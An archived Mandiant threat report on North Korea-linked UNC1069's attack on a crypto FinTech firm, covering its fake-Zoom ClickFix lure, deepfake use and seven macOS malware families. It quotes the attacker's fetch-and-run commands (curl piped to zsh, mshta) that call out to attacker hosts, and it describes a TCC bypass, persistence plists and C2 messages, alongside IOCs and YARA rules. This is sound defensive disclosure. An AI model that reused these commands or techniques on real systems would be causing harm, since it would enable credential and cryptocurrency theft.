{ "id": "38fe2400-2254-4e1b-ba26-b33cb8ba1284", "created_at": "2026-04-06T00:10:08.598406Z", "updated_at": "2026-04-10T13:12:12.648181Z", "deleted_at": null, "sha1_hash": "a052ffc6a85eecd3f0a1b632c5fb52bcee845eed", "title": "UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1075694, "plain_text": "UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering\r\nBy Mandiant\r\nPublished: 2026-02-09 · Archived: 2026-04-05 15:28:44 UTC\r\nWritten by: Ross Inman, Adrian Hernandez\r\nIntroduction\r\nNorth Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi)\r\nverticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to UNC1069, a\r\nfinancially motivated threat actor active since at least 2018. This investigation revealed a tailored intrusion resulting in the\r\ndeployment of seven unique malware families, including a new set of tooling designed to capture host and victim data:\r\nSILENCELIFT, DEEPBREATH and CHROMEPUSH. The intrusion relied on a social engineering scheme involving a\r\ncompromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated\r\nvideo to deceive the victim.\r\nThese tactics build upon a shift first documented in the November 2025 publication GTIG AI Threat Tracker: Advances in\r\nThreat Actor Usage of AI Tools where Google Threat Intelligence Group (GTIG) identified UNC1069's transition from\r\nusing AI for simple productivity gains to deploying novel AI-enabled lures in active operations. The volume of tooling\r\ndeployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to\r\nfacilitate financial theft. While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital\r\nfirms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a\r\nsignificant expansion in their capabilities.\r\nInitial Vector and Social Engineering \r\nThe victim was contacted via Telegram through the account of an executive of a cryptocurrency company that had been\r\ncompromised by UNC1069. Mandiant identified claims from the true owner of the account, posted from another social\r\nmedia profile, where they had posted a warning to their contacts that their Telegram account had been hijacked; however,\r\nMandiant was not able to verify or establish contact with this executive. UNC1069 engaged the victim and, after building a\r\nrapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting\r\nthat was hosted on the threat actor's infrastructure, zoom[.]uswe05[.]us . \r\nThe victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company\r\nthat appeared to be a deepfake. While Mandiant was unable to recover forensic evidence to independently verify the use of\r\nAI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar\r\ncharacteristics, where deepfakes were also allegedly used.\r\nOnce in the \"meeting,\" the fake video call facilitated a ruse that gave the impression to the end user that they were\r\nexperiencing audio issues. This was employed by the threat actor to conduct a ClickFix attack: an attack technique where the\r\nthreat actor directs the user to run troubleshooting commands on their system to address a purported technical issue. The\r\nrecovered web page provided two sets of commands to be run for \"troubleshooting\": one for macOS systems, and one for\r\nWindows systems. Embedded within the string of commands was a single command that initiated the infection chain. \r\nMandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the\r\ncryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees\r\nor executives. This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing\r\nimages or videos during the social engineering stage. \r\nUNC1069 is known to use tools like Gemini to develop tooling, conduct operational research, and assist during the\r\nreconnaissance stages, as reported by GTIG. Additionally, Kaspersky recently claimed Bluenoroff, a threat actor that\r\noverlaps with UNC1069, is also using GTP-4o models to modify images indicating adoption of GenAI tools and integration\r\nof AI into the adversary lifecycle.\r\nInfection Chain \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 1 of 16\n\nIn the incident response engagement performed by Mandiant, the victim executed the \"troubleshooting\" commands provided\r\nin Figure 1, which led to the initial infection of the macOS device.\r\nsystem_profiler SPAudioData\r\nsoftwareupdate --evaluate-products --products audio --agree-to-license\r\ncurl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh\r\nsystem_profiler SPSoundCardData\r\nsoftwareupdate --evaluate-products --products soundcard\r\nsystem_profiler SPSpeechData\r\nsoftwareupdate --evaluate-products --products speech --agree-to-license\r\nFigure 1: Attacker commands shared during the social engineering stage\r\nA set of \"troubleshooting\" commands that targeted Windows operating systems was also recovered from the fake Zoom call\r\nwebpage:\r\nsetx audio_volume 100\r\npnputil /enum-devices /connected /class \"Audio\"\r\nmshta hxxp://mylingocoin[.]com/audio/fix/6454694440\r\nwmic sounddev get Caption, ProductName, DeviceID, Status\r\nmsdt -id AudioPlaybackDiagnostic\r\nexit\r\nFigure 2: Attacker commands shared when Windows is detected\r\nEvidence of AppleScript execution was recorded immediately following the start of the infection chain; however, contents of\r\nthe AppleScript payload could not be recovered from the resident forensic artifacts on the system. Following the AppleScript\r\nexecution a malicious Mach-O binary was deployed to the system. \r\nThe first malicious executable file deployed to the system was a packed backdoor tracked by Mandiant as WAVESHAPER.\r\nWAVESHAPER served as a conduit to deploy a downloader tracked by Mandiant as HYPERCALL as well as subsequent\r\nadditional tooling to considerably expand the adversary's foothold on the system. \r\nMandiant observed three uses of the HYPERCALL downloader during the intrusion: \r\n1. Execute a follow-on backdoor component, tracked by Mandiant as HIDDENCALL, which provided hands-on\r\nkeyboard access to the compromised system\r\n2. Deploy another downloader, tracked by Mandiant as SUGARLOADER\r\n3. Facilitate the execution of a toehold backdoor, tracked by Mandiant as SILENCELIFT, which beacons system\r\ninformation to a command-and-control (C2 or C\u0026C) server\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 2 of 16\n\nXProtect \r\nXProtect is the built-in anti-virus technology included in macOS. Originally relying on signature-based detection only, the\r\nXProtect Behavioral Service (XBS) was introduced to implement behavioral-based detection. If a program violates one of\r\nthe behavioral-based rules, which are defined by Apple, information about the offending program is recorded in the XProtect\r\nDatabase (XPdb), an SQLite 3 database located at /var/protected/xprotect/XPdb .\r\nUnlike signature-based detections, behavioral-based detections do not result in XProtect blocking execution or quarantining\r\nof the offending program. \r\nMandiant recovered the file paths and SHA256 hashes of programs that had violated one or more of the XBS rules from the\r\nXPdb. This included information on malicious programs that had been deleted and could not be recovered. As the XPdb also\r\nincludes a timestamp of the detection, Mandiant could determine the sequence of events associated with malware execution,\r\nfrom the initial infection chain to the next-stage malware deployments, despite no endpoint detection and response (EDR)\r\nproduct being present on the compromised system. \r\nData Harvesting and Persistence\r\nMandiant identified two disparate data miners that were deployed by the threat actor during their access period:\r\nDEEPBREATH and CHROMEPUSH. \r\nDEEPBREATH, a data miner written in Swift, was deployed via HIDDENCALL—the follow-on backdoor component to\r\nHYPERCALL. DEEPBREATH manipulates the Transparency, Consent, and Control (TCC) database to gain broad file\r\nsystem access, enabling it to steal:\r\n1. Credentials from the user's Keychain\r\n2. Browser data from Chrome, Brave, and Edge\r\n3. User data from two different versions of Telegram\r\n4. User data from Apple Notes\r\nDEEPBREATH stages the targeted data in a temporary folder location and compresses the data into a ZIP archive, which\r\nwas exfiltrated to a remote server via the curl command-line utility. \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 3 of 16\n\nMandiant also identified HYPERCALL deployed an additional malware loader, tracked as part of the code family\nSUGARLOADER. A persistence mechanism was installed in the form of a launch daemon for SUGARLOADER, which\nconfigured the system to execute the malware during the macOS startup process. The launch daemon was configured\nthrough a property list (Plist) file, /Library/LaunchDaemons/com.apple.system.updater.plist . The contents of the launch\ndaemon Plist file are provided in Figure 4.\n?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\nLabelcom.apple.system.updaterProgramArguments/Library/OSRecovery/SystemUpdaterRunAtLoadKeepAliveExitTimeOut10 Figure 4: Launch daemon Plist configured to execute SUGARLOADER\nThe SUGARLOADER sample recovered during the investigation did not have any internal functionality for establishing\npersistence; therefore, Mandiant assesses the launch daemon was created manually via access granted by one of the other\nmalicious programs.\nMandiant observed SUGARLOADER was solely used to deploy CHROMEPUSH, a data miner written in C++.\nCHROMEPUSH deployed a browser extension to Google Chrome and Brave browsers that masqueraded as an extension\npurposed for editing Google Docs offline. CHROMEPUSH additionally possessed the capability to record keystrokes,\nobserve username and password inputs, and extract browser cookies, completing the data harvesting on the host.\nIn the Spotlight: UNC1069\nUNC1069 is a financially motivated threat actor that is suspected with high confidence to have a North Korea nexus and that\nhas been tracked by Mandiant since 2018. Mandiant has observed this threat actor evolve its tactics, techniques, and\nprocedures (TTPs), tooling, and targeting. Since at least 2023, the group has shifted from spear-phishing techniques and\ntraditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers\nat financial institutions, high-technology companies, and individuals at venture capital funds. Notably, while UNC1069 has\nhad a smaller impact on cryptocurrency heists compared to other groups like UNC4899 in 2025, it remains an active threat\ntargeting centralized exchanges and both entities and individuals for financial gain.\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\nPage 4 of 16\n\nFigure 5: UNC1069 victimology map\r\nMandiant has observed this group active in 2025 targeting the financial services and the cryptocurrency industry in\r\npayments, brokerage, staking, and wallet infrastructure verticals. \r\nWhile UNC1069 operators have targeted both individuals in the Web3 space and corporate networks in these verticals,\r\nUNC1069 and other suspected Democratic People's Republic of Korea (DPRK)-nexus groups have demonstrated the\r\ncapability to move from personal to corporate devices using different techniques in the past. However, for this particular\r\nincident, Mandiant noted an unusually large amount of tooling dropped onto a single host targeting a single individual. This\r\nevidence confirms this incident was a targeted attack to harvest as much data as possible for a dual purpose; enabling\r\ncryptocurrency theft and fueling future social engineering campaigns by leveraging victim’s identity and data.\r\nSubsequently, Mandiant identified seven distinct malware families during the forensic analysis of the compromised system,\r\nwith SUGARLOADER being the only malware family already tracked by Mandiant prior to the investigation.\r\nTechnical Appendix\r\nWAVESHAPER\r\nWAVESHAPER is a backdoor written in C++ and packed by an unknown packer that targets macOS. The backdoor supports\r\ndownloading and executing arbitrary payloads retrieved from its command-and-control (C2 or C\u0026C) server, which is\r\nprovided via the command-line parameters. To communicate with the adversary infrastructure, WAVESHAPER leverages\r\nthe curl library for either HTTP or HTTPS, depending on the command-line argument provided.\r\nWAVESHAPER also runs as a daemon by forking itself into a child process that runs in the background detached from the\r\nparent session and collects the following system information, which is sent to the C\u0026C server in a HTTP POST request:\r\nRandom victim UID (16 alphanumeric chars)\r\nVictim username\r\nVictim machine name\r\nSystem time zone\r\nSystem boot time using sysctlbyname(\"kern.boottime\")\r\nRecently installed software\r\nHardware model\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 5 of 16\n\nCPU information\r\nOS version\r\nList of the running processes\r\nPayloads downloaded from the C\u0026C server are saved to a file system location matching the following regular expression\r\npattern: /tmp/\\.[A-Za-z0-9]{6} .\r\nHYPERCALL\r\nHYPERCALL is a Go-based downloader designed for macOS that retrieves malicious dynamic libraries from a designated\r\nC\u0026C server. The C\u0026C address is extracted from an RC4-encrypted configuration file that must be present on the disk\r\nalongside the binary. Once downloaded, the library is reflectively loaded for in-memory execution.\r\nMandiant observed recognizable influences from SUGARLOADER in HYPERCALL, despite the new downloader being\r\nwritten in a different language (Golang instead of C++) and having a different development process. These similarities\r\ninclude the use of an external configuration file for the C\u0026C infrastructure, the use of the RC4 algorithm for configuration\r\nfile decryption, and the capability for reflective library injection.\r\nNotably, some elements in HYPERCALL appear to be incomplete. For instance, the presence of configuration parameters\r\nthat are of no use reveals a lack of technical proficiency by some of UNC1069's malware developers compared to other\r\nNorth Korea-nexus threat actors.\r\nHYPERCALL accepts a single command-line argument to which it expects a C\u0026C host to connect. This command is then\r\nsaved to the configuration file located at /Library/SystemSettings/.CacheLogs.db . HYPERCALL also leverages a hard-coded 16-byte RC4 key to decrypt the data stored within the configuration file, a pattern observed within other UNC1069\r\nmalware families. \r\nThe HYPERCALL configuration instructed the downloader to communicate with the following C\u0026C servers on TCP port\r\n443:\r\nwss://supportzm[.]com\r\nwss://zmsupport[.]com\r\nOnce connected, the HYPERCALL registers with the C\u0026C using the following message expecting a response message of 1:\r\n{\r\n \"type\": \"loader\",\r\n \"client_id\": \u003cclient_id\u003e\r\n}\r\nFigure 6: Registration message sent to the C\u0026C server\r\nOnce the HYPERCALL has registered with the C\u0026C server, it sends a dynamic library download request:\r\n{\r\n \"type\": \"get_binary\",\r\n \"system\": \"darwin\"\r\n}\r\nFigure 7: Dynamic library download request message sent to the C\u0026C server\r\nThe C\u0026C server responds to the request with information on the dynamic library to download, followed by the dynamic\r\nlibrary content:\r\n{\r\n \"type\": \u003cunknown\u003e,\r\n \"total_size\": \u003ctotal_size\u003e\r\n}\r\nFigure 8: Dynamic library download response message received by the C\u0026C server\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 6 of 16\n\nThe C\u0026C server informs the HYPERCALL client all of the dynamic library content has been sent via the following\r\nmessage:\r\n{\r\n \"type\": \"end_chunks\"\r\n}\r\nFigure 9: Message sent by the C\u0026C server to mark the end of the dynamic library content\r\nAfter receiving the dynamic library, HYPERCALL sends a final acknowledgement message:\r\n{\r\n \"type\": \"down_ok\"\r\n}\r\nFigure 10: Final acknowledgement message sent by HYPERCALL to the C\u0026C server\r\nHYPERCALL then waits for three seconds before executing the downloaded dynamic library in-memory using reflective\r\nloading.\r\nHIDDENCALL\r\nWe assess with high confidence that UNC1069 utilizes the HYPERCALL downloader and HIDDENCALL backdoor as\r\ncomponents of a single, synchronized attack lifecycle. \r\nThis assessment is supported by forensic observations of HYPERCALL downloading and reflectively injecting\r\nHIDDENCALL into system memory. Furthermore, technical examination revealed significant code overlaps between the\r\nHYPERCALL Golang binary and HIDDENCALL's Ahead-of-Time (AOT) translation files. Both families utilize identical\r\nlibraries and follow a distinct \" t_ \" naming convention for functions (such as t_loader and t_ ), strongly suggesting a\r\nunified development environment and shared tradecraft. The use of this custom, integrated tooling suite highlights\r\nUNC1069's technical proficiency in developing specialized capabilities to bypass security measures and secure long-term\r\npersistence in target networks.\r\nRosetta Cache Analysis\r\nMandiant has previously documented how files from the Rosetta cache can be used to prove program execution, as well as\r\nhow malware identification can be possible through analysis of the symbols present in the AOT translation files.\r\nHYPERCALL leveraged the NSCreateObjectFileImageFromMemory API call to reflectively load a follow-on backdoor\r\ncomponent from memory. When NSCreateObjectFileImageFromMemory is called, the executable file that is to be loaded\r\nfrom memory is temporarily written to disk under the /tmp/ folder, with the filename matching the regular expression\r\npattern NSCreateObjectFileImageFromMemory-[A-Za-z0-9]{8} . \r\nThis intrinsic behaviour, combined with the HIDDENCALL payload being compiled for x86_64 architecture, resulted in the\r\ncreation of a Rosetta cache AOT file for the reflectively loaded Mach-O executable. Through analysis of the Rosetta cache\r\nfile, Mandiant was able to assess with high confidence that the reflectively loaded Mach-O executable was the follow-on\r\nbackdoor component, also written in Golang, that Mandiant tracks as HIDDENCALL. \r\nListed in Figure 11 through Figure 14 are the symbols and project file paths identified from the AOT file associated with\r\nHIDDENCALL execution, as well as the HYPERCALL sample analysed by Mandiant, which were used to assess the\r\nfunctionality of HIDDENCALL.\r\n_t/common.rc4_encode\r\n_t/common.resolve_server\r\n_t/common.load_config\r\n_t/common.save_config\r\n_t/common.generate_uid\r\n_t/common.send_data\r\n_t/common.send_error_message\r\n_t/common.get_local_ip\r\n_t/common.get_info\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 7 of 16\n\n_t/common.rsp_get_info\r\n_t/common.override_env\r\n_t/common.exec_command_with_timeout\r\n_t/common.exec_command_with_timeout.func1\r\n_t/common.rsp_exec_cmd\r\n_t/common.send_file\r\n_t/common.send_file.deferwrap1\r\n_t/common.add_file_to_zip\r\n_t/common.add_file_to_zip.deferwrap1\r\n_t/common.zip_file\r\n_t/common.zip_file.func1\r\n_t/common.zip_file.deferwrap2\r\n_t/common.zip_file.deferwrap1\r\n_t/common.rsp_zdn\r\n_t/common.rsp_dn\r\n_t/common.receive_file\r\n_t/common.receive_file.deferwrap1\r\n_t/common.unzipFile\r\n_t/common.unzipFile.deferwrap1\r\n_t/common.rsp_up\r\n_t/common.rsp_inject_explorer\r\n_t/common.rsp_inject\r\n_t/common.wipe_file\r\n_t/common.rsp_wipe_file\r\n_t/common.send_cmd_result\r\n_t/common.rsp_new_shell\r\n_t/common.rsp_exit_shell\r\n_t/common.rsp_enter_shell\r\n_t/common.rsp_leave_shell\r\n_t/common.rsp_run\r\n_t/common.rsp_runx\r\n_t/common.rsp_test_conn\r\n_t/common.rsp_check_event\r\n_t/common.rsp_sleep\r\n_t/common.rsp_pv\r\n_t/common.rsp_pcmd\r\n_t/common.rsp_pkill\r\n_t/common.rsp_dir\r\n_t/common.rsp_state\r\n_t/common.rsp_get_cfg\r\n_t/common.rsp_set_cfg\r\n_t/common.rsp_chdir\r\n_t/common.get_file_property\r\n_t/common.get_file_property.func1\r\n_t/common.rsp_file_property\r\n_t/common.do_work\r\n_t/common.do_work.deferwrap1\r\n_t/common.Start\r\n_t/common.init_env\r\n_t/common.get_config_path\r\n_t/common.get_startup_path\r\n_t/common.get_launch_plist_path\r\n_t/common.get_os_info\r\n_t/common.get_process_uid\r\n_t/common.get_file_info\r\n_t/common.get_dir_entries\r\n_t/common.is_locked\r\n_t/common.check_event\r\n_t/common.change_dir\r\n_t/common.run_command_line\r\n_t/common.run_command_line.func1\r\n_t/common.copy_file\r\n_t/common.copy_file.deferwrap2\r\n_t/common.copy_file.deferwrap1\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 8 of 16\n\n_t/common.setup_startup\r\n_t/common.file_exist\r\n_t/common.session_work\r\n_t/common.exit_shell\r\n_t/common.restart_shell\r\n_t/common.start_shell_reader\r\n_t/common.watch_shell_output_loop\r\n_t/common.watch_shell_output_loop.func1\r\n_t/common.watch_shell_output_loop.func1.deferwrap1\r\n_t/common.exec_with_shell\r\n_t/common.start_shell_reader.func1\r\n_t/common.do_work.jump513\r\n_t/common.g_shoud_fork\r\n_t/common.CONFIG_CRYPT_KEY\r\n_t/common.g_conn\r\n_t/common.g_shell_cmd\r\n_t/common.g_shell_pty\r\n_t/common.stop_reader_chan\r\n_t/common.stop_watcher_chan\r\n_t/common.g_config_file_path\r\n_t/common.g_output_buffer\r\n_t/common.g_cfg\r\n_t/common.g_use_shell\r\n_t/common.g_working\r\n_t/common.g_out_changed\r\n_t/common.g_reason\r\n_t/common.g_outputMutex\r\nFigure 11: Notable Golang symbols from the HIDDENCALL AOT file analyzed by Mandiant\r\nt_loader/common\r\nt_loader/inject_mac\r\nt_loader/inject_mac._Cfunc_InjectDylibFromMemory\r\nt_loader/inject_mac.Inject\r\nt_loader/inject_mac.Inject.func1\r\nt_loader/common.rc4_encode\r\nt_loader/common.generate_uid\r\nt_loader/common.load_config\r\nt_loader/common.rc4_decode\r\nt_loader/common.save_config\r\nt_loader/common.resolve_server\r\nt_loader/common.receive_file\r\nt_loader/common.Start\r\nt_loader/common.check_server_urls\r\nt_loader/common.inject_pe\r\nt_loader/common.init_env\r\nt_loader/common.get_config_path\r\nFigure 12: Notable Golang symbols from the HYPERCALL AOT file analyzed by Mandiant\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000000.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000004.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000005.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000006.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000007.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000008.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000009.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000010.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000011.o)\r\nFigure 13: Project file paths from the HIDDENCALL AOT file analyzed by Mandiant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 9 of 16\n\n/Users/mac/Documents/go_t/t_loader/inject_mac/inject.go\r\n/Users/mac/Documents/go_t/t_loader/common/common.go\r\n/Users/mac/Documents/go_t/t_loader/common/common_unix.go\r\n/Users/mac/Documents/go_t/t_loader/exe.go\r\nFigure 14: Project file paths from the HYPERCALL AOT file analyzed by Mandiant\r\nDEEPBREATH\r\nA new piece of macOS malware identified during the intrusion was DEEPBREATH, a sophisticated data miner designed to\r\nbypass a key component of macOS privacy: the Transparency, Consent, and Control (TCC) database. \r\nWritten in Swift, DEEPBREATH's primary purpose is to gain access to files and sensitive personal information.\r\nTCC Bypass\r\nInstead of prompting the user for elevated permissions, DEEPBREATH directly manipulates the user's TCC database\r\n( TCC.db ). It executes a series of steps to circumvent protections that prevent direct modification of the live database:\r\n1. Staging: It leverages the Finder application to rename the user's TCC folder and copies the TCC.db file to a\r\ntemporary staging location, which allows it to modify the database unchallenged. \r\n2. Permission Injection: Once staged, the malware programmatically inserts permissions, effectively granting itself\r\nbroad access to critical user folders like Desktop, Documents, and Downloads.\r\n3. Restoration: Finally, it restores the modified database back to its original location, giving DEEPBREATH the broad\r\nfile system access it needs to operate.\r\nIt should be noted that this technique is possible due to the Finder application possessing Full Disk Access (FDA)\r\npermissions, which are the permissions necessary to modify the user-specific TCC database in macOS. \r\nTo ensure its operation remains uninterrupted, the malware uses an AppleScript to re-launch itself in the background using\r\nthe -autodata argument, detaching from the initial process to continue data collection silently throughout the user's\r\nsession.\r\nWith elevated access, DEEPBREATH systematically targets high-value data:\r\nCredentials: Steals login credentials from the user keychain ( login.keychain-db )\r\nBrowser Data: Copies cookies, login data, and local extension settings from major browsers including Google\r\nChrome, Brave, and Microsoft Edge across all user profiles\r\nMessaging and Notes: Exfiltrates user data from two different versions of Telegram and also targets and copies\r\ndatabase files from Apple Notes\r\nDEEPBREATH is a prime example of an attack vector focused on bypassing core operating system security features to\r\nconduct widespread data theft.\r\nSUGARLOADER\r\nSUGARLOADER is a downloader written in C++ historically associated with UNC1069 intrusions.\r\nBased on the observations from this intrusion, SUGARLOADER was solely used to deploy CHROMEPUSH. If\r\nSUGARLOADER is run without any command arguments, the binary checks for an existing configuration file located on\r\nthe victim's computer at /Library/OSRecovery/com.apple.os.config . \r\nThe configuration is encrypted using RC4, with a hard-coded 32-byte key found in the binary. \r\nOnce decrypted, the configuration data contains up to two URLs that point to the next stage. The URLs are queried to\r\ndownload the next stage of the infection; if the first URL responds with a suitable executable payload, then the second URL\r\nis not queried. \r\nThe decrypted SUGARLOADER configuration for the sample analysed by Mandiant included the following C\u0026C servers:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 10 of 16\n\nbreakdream[.]com:443\ndreamdie[.]com:443\nCHROMEPUSH\nDuring this intrusion, a second dataminer was recovered and named CHROMEPUSH. This data miner is written in C++ and\ninstalls itself as a browser extension targeting Chromium-based browsers, such as Google Chrome and Brave, to collect\nkeystrokes, username and password inputs, and browser cookies, which it uploads to a web server.\nCHROMEPUSH establishes persistence by installing itself as a native messaging host for Chromium-based browsers. For\nGoogle Chrome, CHROMEPUSH copies itself to %HOME%/Library/Application\nSupport/Google/Chrome/NativeMessagingHosts/Google Chrome Docs and creates a corresponding manifest file,\ncom.google.docs.offline.json , in the same directory.\n{\n \"name\": \"com.google.docs.offline\",\n \"description\": \"Native messaging for Google Docs Offline extension\",\n \"path\": \"%HOME%/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs\",\n \"type\": \"stdio\",\n \"allowed_origins\": [ \"chrome-extension://hennhnddfkgohngcngmflkmejacokfik/\" ]\n}\nFigure 15: Manifest file for Google Chrome native messaging host established by the data miner\nBy installing itself as a native messaging host, CHROMEPUSH will be automatically executed when the corresponding\nbrowser is executed.\nOnce executed via the native messaging host mechanism, the data miner creates a base data directory at\n%HOME%/Library/Application Support/com.apple.os.receipts and performs browser identification. A subdirectory within\nthe base data directory is created with the corresponding identifier, which is based on the detected browser:\nGoogle Chrome leads to the subdirectory being named \" c\".\nBrave Browser leads to the subdirectory being named \" b\".\nArc leads to the subdirectory being named \" a\".\nMicrosoft Edge leads to the subdirectory being named \" e\".\nIf none of these match, the subdirectory name is set to \" u\".\nCHROMEPUSH reads configuration data from the file location %HOME%/Library/Application\nSupport/com.apple.os.receipts/setting.db. The configuration settings are parsed in JavaScript Objection Notation\n(JSON) format. The names of the used JSON variables indicate their potential usage:\ncap_on : Assumed to control whether screen captures should be taken\ncap_time : Assumed to control the interval of screen captures\ncoo_on : Assumed to control whether cookies should be accessed\ncoo_time : Assumed to control the interval of accessing the cookie data\nkey_on : Assumed to control whether keypresses should be logged\nC\u0026C URL\nCHROMEPUSH stages collected data in temporary files within the %HOME%/Library/Application\nSupport/com.apple.os.receipts// directory.\nThese files are then renamed using the following formats:\nScreenshots: CAYYMMDDhhmmss.dat\nKeylogging: KLYYMMDDhhmmss.dat\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\nPage 11 of 16\n\nCookies: CK_.dat\nCHROMEPUSH stages and sends the collected data in HTTP POST requests to its C\u0026C server. In the sample analysed by\nMandiant, the C\u0026C server was identified as hxxp://cmailer[.]pro:80/upload .\nSILENCELIFT\nSILENCELIFT is a minimalistic backdoor written in C/C++ that beacons host information to a hard-coded C\u0026C server. The\nC\u0026C server identified in this sample was identified as support-zoom[.]us .\nSILENCELIFT retrieves a unique ID from the hard-coded file path /Library/Caches/.Logs.db. Notably, this is the exact same\npath used by the CHROMEPUSH. The backdoor also gets the lock screen status, which is sent to the C\u0026C server with the\nunique ID.\nIf executed with root privileges, SILENCELIFT can actively interrupt Telegram communications while beaconing to its\nC\u0026C server.\nIndicators of Compromise\nTo assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of\ncompromise (IOCs) in a GTI Collection for registered users.\nNetwork-Based Indicators\nIndicator Description\nmylingocoin.com Hosted the payload that was retrieved and executed to commence the initial infection\nzoom.uswe05.us Hosted the fake Zoom meeting\nbreakdream.com SUGARLOADER C\u0026C\ndreamdie.com SUGARLOADER C\u0026C\nsupport-zoom.us SILENCELIFT C\u0026C\nsupportzm.com HYPERCALL C\u0026C\nzmsupport.com HYPERCALL C\u0026C\ncmailer.pro CHROMEPUSH upload server\nHost-Based Indicators\nDescription SHA-256 Hash File Name\nDEEPBREATH b452C2da7c012eda25a1403b3313444b5eb7C2c3e25eee489f1bd256f8434735 /Library/Caches/System Settings\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\nPage 12 of 16\n\nSUGARLOADER 1a30d6cdb0b98feed62563be8050db55ae0156ed437701d36a7b46aabf086ede /Library/OSRecovery/SystemUpdater\r\nWAVESHAPER b525837273dde06b86b5f93f9aeC2C29665324105b0b66f6df81884754f8080d /Library/Caches/com.apple.mond\r\nHYPERCALL c8f7608d4e19f6cb03680941bbd09fe969668bcb09c7ca985048a22e014dffcd /Library/SystemSettings/com.apple.sys\r\nCHROMEPUSH 603848f37ab932dccef98ee27e3c5af9221d3b6ccfe457ccf93cb572495ac325\r\n/Users/\u003cuser\u003e/Library/Application\r\nSupport/Google/Chrome/NativeMessagingH\r\nBrowser Docs\r\n/Users/\u003cuser\u003e/Library/Application\r\nSupport/Google/Chrome/NativeMessagingH\r\nChrome Docs\r\n/Library/Caches/chromeext\r\nSILENCELIFT c3e5d878a30a6c46e22d1dd2089b32086c91f13f8b9c413aa84e1dbaa03b9375 /Library/Fonts/com.apple.logd\r\nHYPERCALL\r\nconfiguration\r\n(executes itself\r\nwith sudo)\r\n03f00a143b8929585c122d490b6a3895d639c17d92C2223917e3a9ca1b8d30f9 /Library/SystemSettings/.CacheLogs.db\r\nYARA Rules\r\nrule G_Backdoor_WAVESHAPER_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_created = \"2025-11-03\"\r\ndate_modified = \"2025-11-03\"\r\nmd5 = \"c91725905b273e81e9cc6983a11c8d60\"\r\nrev = 1\r\nstrings:\r\n$str1 = \"mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\"\r\n$str2 = \"/tmp/.%s\"\r\n$str3 = \"grep \\\"Install Succeeded\\\" /var/log/install.log | awk '{print $1, $2}'\"\r\n$str4 = \"sysctl -n hw.model\"\r\n$str5 = \"sysctl -n machdep.cpu.brand_string\"\r\n$str6 = \"sw_vers --ProductVersion\"\r\ncondition:\r\nall of them\r\n}\r\nrule G_Backdoor_WAVESHAPER_2 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_created = \"2025-11-03\"\r\ndate_modified = \"2025-11-03\"\r\nmd5 = \"eb7635f4836c9e0aa4c315b18b051cb5\"\r\nrev = 1\r\nstrings:\r\n$str1 = \"__Z10RunCommand\"\r\n$str2 = \"__Z11GenerateUID\"\r\n$str3 = \"__Z11GetResponse\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 13 of 16\n\n$str4 = \"__Z13WriteCallback\"\r\n$str5 = \"__Z14ProcessRequest\"\r\n$str6 = \"__Z14SaveAndExecute\"\r\n$str7 = \"__Z16MakeStatusString\"\r\n$str8 = \"__Z24GetCurrentExecutablePath\"\r\n$str9 = 